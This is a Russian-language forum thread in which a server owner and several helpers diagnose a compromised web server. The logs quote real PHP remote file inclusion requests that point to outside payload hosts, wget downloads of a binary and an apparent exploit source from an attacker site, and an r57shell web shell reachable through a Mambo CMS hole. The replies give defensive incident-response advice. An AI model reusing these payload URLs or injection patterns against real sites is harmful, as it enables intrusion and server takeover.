Получил странный емайл   :

The log included below shows an PHP remote file inclusion attempt from
> 83.XX.XX.XX.XX (МОЙ IP) 
> an IP address in one of your netblocks. 
> 
> The IP address of the system reporting this attack is 72.XX.XX.XX.XX 
> Destination port for all entries is TCP/80. 
> Times listed are UTC and are accurate. 
> 
> It is likely that the machine having IP address 83.XX.XX.XX.XX is itself
> compromised, 
> and is launching this same attack against many other systems besides
ours. 
> 
> Please deal with this incident in accordance with your Acceptable Use
> Policy. 
> 
> Thank You
> 
> [email protected]
> 
> 72.XX.XX.XX.XX (essexhosting.net) Server Log:
> 
> 83.XX.XX.XX.XX - - [10/May/2008:21:28:05 +0000] "GET
> //initiate.php?abs_path=http://www.guardmusic.com/echo.txt? HTTP/1.1" 403
> 481 "-" "libwww-perl/5.803" (malwarebytes.org) "-"
> 83.XX.XX.XX.XX - - [10/May/2008:22:01:48 +0000] "GET
>
/forums/index.php?showtopic=1680//initiate.php?abs_path=http://www.guardmusi
> c.com/echo.txt? HTTP/1.1" 403 484 "-" "libwww-perl/5.803"
(malwarebytes.org)
> "-"
> 83.XX.XX.XX.XX - - [10/May/2008:22:01:49 +0000] "GET
> /forums//initiate.php?abs_path=http://www.guardmusic.com/echo.txt?
HTTP/1.1"
> 403 488 "-" "libwww-perl/5.803" (malwarebytes.org) "-"



Объясните пожалуйста что же все таки вытворял мой сервак? и что мне предпринять?

поменять пароль на фтп и поставить на домашнюю тачку антивирус.
ысерваки сейчас никто не ломает. куда проще подсунуть трояна любителям порнушки =)

пароли уже сменил, а вот с антивирусом будет посложнее...сервак не домашний)))

jd7710,  Антивирус надо ставить на домашний комп. Так как скорей всего вирус сидит у тебя и просто мониторит коннекты по ftp и ssh и отсылает пароли хозяину.

Еще неплохо бы сервер проверить на наличие руткитов.  Есть такая штука:
http://www.rootkit.nl/projects/rootkit_hunter.html 
мне как-то рекомендовали, но я не использовал, так как выяснилось, что взлом произошел из-за трояна хакнувшего тоталкоммандер человека имевшего ftp доступ к серверу.

проверил руткитом (Rootkit Hunter version 1.3.2)
 выдал вот такую инфу  :

[21:35:19] Starting system checks...

[21:36:20] Performing file properties checks
[21:36:21] Info: Starting test name 'properties'
[21:36:21] Warning: Checking for prerequisites               [ Warning ]
[21:36:22]          The file of stored file properties (rkhunter.dat) does not exist, and so must be created. To do this type in 'rkhunter --propupd'.
[21:36:22]
[21:36:22] Warning: WARNING! It is the users responsibility to ensure that when the '--propupd' option
           is used, all the files on their system are known to be genuine, and installed from a
           reliable source. The rkhunter '--check' option will compare the current file properties
           against previously stored values, and report if any values differ. However, rkhunter
           cannot determine what has caused the change, that is for the user to do.


[21:36:35] /bin/egrep                                        [ Warning ]
[21:36:36] Warning: The command '/bin/egrep' has been replaced by a script: /bin/egrep: Bourne shell script text executable
[21:36:38] /bin/fgrep                                        [ Warning ]
[21:36:39] Warning: The command '/bin/fgrep' has been replaced by a script: /bin/fgrep: Bourne shell script text executable

[21:37:25] /usr/bin/groups                                   [ Warning ]
[21:37:25] Warning: The command '/usr/bin/groups' has been replaced by a script: /usr/bin/groups: Bourne shell script text executable

[21:37:35] /usr/bin/ldd                                      [ Warning ]
[21:37:35] Warning: The command '/usr/bin/ldd' has been replaced by a script: /usr/bin/ldd: Bourne-Again shell script text executable

[21:38:18] /usr/bin/which                                    [ Warning ]
[21:38:19] Warning: The command '/usr/bin/which' has been replaced by a script: /usr/bin/which: Bourne shell script text executable

[21:38:24] /usr/bin/lwp-request                              [ Warning ]
[21:38:24] Warning: The command '/usr/bin/lwp-request' has been replaced by a script: /usr/bin/lwp-request: perl script text executable

[21:38:45] /usr/sbin/adduser                                 [ Warning ]
[21:38:46] Warning: The command '/usr/sbin/adduser' has been replaced by a script: /usr/sbin/adduser: perl script text executable




[21:46:32] Performing trojan specific checks
[21:46:32] Info: Starting test name 'trojans'
[21:46:32] Info: Using inetd configuration file '/etc/inetd.conf'
[21:46:33]   Checking for enabled inetd services             [ Warning ]
[21:46:34] Warning: Found enabled inetd service: finger
[21:46:34] Warning: Found enabled inetd service: ident



[21:46:36] Performing Linux specific checks
[21:46:37] Info: Starting test name 'os_specific'
[21:46:37]   Checking kernel module commands                 [ Warning ]
[21:46:38] Warning: No output found from the lsmod command or the /proc/modules file:
[21:46:38]          /proc/modules output: 
[21:46:39]          lsmod output: 
[21:46:39] Info: Using modules pathname of '/lib/modules'


[21:52:33] Info: Starting test name 'passwd_changes'
[21:52:34]   Checking for passwd file changes                [ Warning ]
[21:52:34] Warning: Users have been added to the passwd file:
[21:52:35]          web1:x:648:648::/home/www/web1:/bin/false
[21:52:35] Info: Starting test name 'group_changes'
[21:52:36]   Checking for group file changes                 [ Warning ]
[21:52:36] Warning: Groups have been added to the group file:
[21:52:37]          ftponly:x:501:web0,web1,web2,web3
[21:52:37]          web1:x:648:
[21:52:38] Warning: Groups have been removed from the group file:
[21:52:38]          ftponly:x:501:web0,web2,web3


[21:52:42]   Checking if SSH root access is allowed          [ Warning ]
[21:52:43] Warning: The SSH and rkhunter configuration options should be the same:
[21:52:43]          SSH configuration option 'PermitRootLogin': yes
[21:52:43]          Rkhunter configuration option 'ALLOW_SSH_ROOT_USER': no
[21:52:44]   Checking if SSH protocol v1 is allowed          [ Warning ]
[21:52:44] Warning: SSH protocol version 1 has been enabled in the SSH configuration file (/etc/ssh/sshd_config).


[21:52:49]   Checking /dev for suspicious file types         [ Warning ]
[21:52:50] Warning: Suspicious file types found in /dev:
[21:52:50]          /dev/shm/network/ifstate: ASCII text


[21:56:49]   Checking version of OpenSSL                     [ Warning ]
[21:56:49] Warning: Application 'openssl', version '0.9.7e', is out of date, and possibly a security risk



на сколько все запущенно? есть шанс все исправить или надо сервак заново инсталировать?

можно немножко по подробнее  

jd7710, 

Запости сюда вывод команды 
cat /bin/fgrep

(т.е.  содержание файла /bin/fgrep)

jd7710, 

Это нормально.
Просто вызывается grep с ключом "-F"

проcмотрел error.log , что это значит?

sh: line 1: sysctl: command not found
sh: line 1: sysctl: command not found
[Wed Jun 04 14:04:07 2008] [error] [client 213.140.6.113] File does not exist: /home/www/web0/html/mambo/css, referer: http://МОЙ САЙТ/index.php?_=&_REQUEST%5boption%5d=com_content&_REQUEST%5bIteREQUESTmid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.endureros.com/modules/img/aa.gif??
[Wed Jun 04 14:04:38 2008] [error] [client 213.140.6.113] File does not exist: /home/www/web0/html/mambo/css, referer: http://МОЙ САЙТ/index.php?_=&_REQUEST%5boption%5d=com_content&_REQUEST%5bIteREQUESTmid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.endureros.com/modules/img/aa.gif??
--14:04:53--  http://reloaded-crew.t35.com/httpd
           => `httpd'
Resolving reloaded-crew.t35.com... 66.45.237.220
Connecting to reloaded-crew.t35.com|66.45.237.220|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 219,325 (214K) [text/plain]

    0K .......... .......... .......... .......... .......... 23%   96.41 KB/s
   50K .......... .......... .......... .......... .......... 46%  343.25 KB/s
  100K .......... .......... .......... .......... .......... 70%  295.16 KB/s
  150K .......... .......... .......... .......... .......... 93%   44.39 KB/s
  200K .......... ....                                       100%   27.82 MB/s

14:05:00 (109.24 KB/s) - `httpd' saved [219325/219325]

[Wed Jun 04 14:05:01 2008] [error] [client 213.140.6.113] File does not exist: /home/www/web0/html/mambo/css, referer: http://МОЙ САЙТ/index.php?_=&_REQUEST%5boption%5d=com_content&_REQUEST%5bIteREQUESTmid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.endureros.com/modules/img/aa.gif??
--14:05:16--  http://reloaded-crew.t35.com/Fabietto/rip3.c
           => `rip3.c'
Resolving reloaded-crew.t35.com... 66.45.237.220
Connecting to reloaded-crew.t35.com|66.45.237.220|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20,817 (20K) [text/plain]

    0K .......... ..........                                 100%   67.90 KB/s

14:05:17 (67.90 KB/s) - `rip3.c' saved [20817/20817]

[Wed Jun 04 14:05:18 2008] [error] [client 213.140.6.113] File does not exist: /home/www/web0/html/mambo/css, referer: http://МОЙ САЙТ/index.php?_=&_REQUEST%5boption%5d=com_content&_REQUEST%5bIteREQUESTmid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.endureros.com/modules/img/aa.gif??



Если в набираю вот эту ссылку (http://МОЙ САЙТ/index.php?_=&_REQUEST%5boption%5d=com_content&_REQUEST%5bIteREQUESTmid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.endureros.com/modules/img/aa.gif?? ) грузиться сайт и внизу появлятся панель управления шела (r57shell)  

что делать? где его искать, сайт сливал и проверял касперским...ни чего не нашел. [/b]

Это сообщение отредактировал(а) jd7710 - 13.6.2008, 22:14

если "Rootkit Hunter version 1.3.2" не врёт, сервер таки ДА ломанули.
части системных програм подменили.
руткит поставили детский, т.к. ты его смог обнаружить так легко.

не знаю на какой системе вы работаете, есть прекрасный проект http://www.chkrootkit.org/
который тоже довольно сносно диагностирует систему.
можешь ее запустить, авось найдешь еще чего.

нужно сделать так:
1. зарезервировать систему (для дальнейшего изучения всех этапов атаки, и для реставрации нужных данных )
2. создать чистую систему, с обновленным ПО, без дырок, которыми воспользовались атакующие.
3. реставрировать систему из нового, недырявого бекапа.

если это хостинг, просите помощи у их security team.

Добавлено через 4 минуты и 2 секунды

это похоже на какую-то програмку, которую атакующий бот скачал с сети.
если у тебя был установлен компилятор, то ее наверное собрали и запустили.
эта программка скорее всего дала доступ root процессу, к-рый ее запустил. и тот, собака наверное и натворил с твоей системой все эти пакости.
скачай програмку сам и изучи. 20k это не маленькая программка.

Спасибо всем за помощь!!

Когда брал сервак много чего не знал , а именно не сделал сразу бэкап пока система чистая была... Я думаю к провайдеру безполезно обращаться, сервак у меня забугорный)) все услуги платные...да и по русски им не объяснишь))) легче тот удалить  и взять новый и делать сразу все правельно...

jd7710, судя по этим логам, у тебя сайт построен на базе кривой, но популярной CMS.
В CMS есть дыра. Через эту дыру тебе на сайт заливают трояна

Стоит мамба параноя, буду теперь менять на другую версию
найти самому дыру в CMS просто не хватит времени и мозгов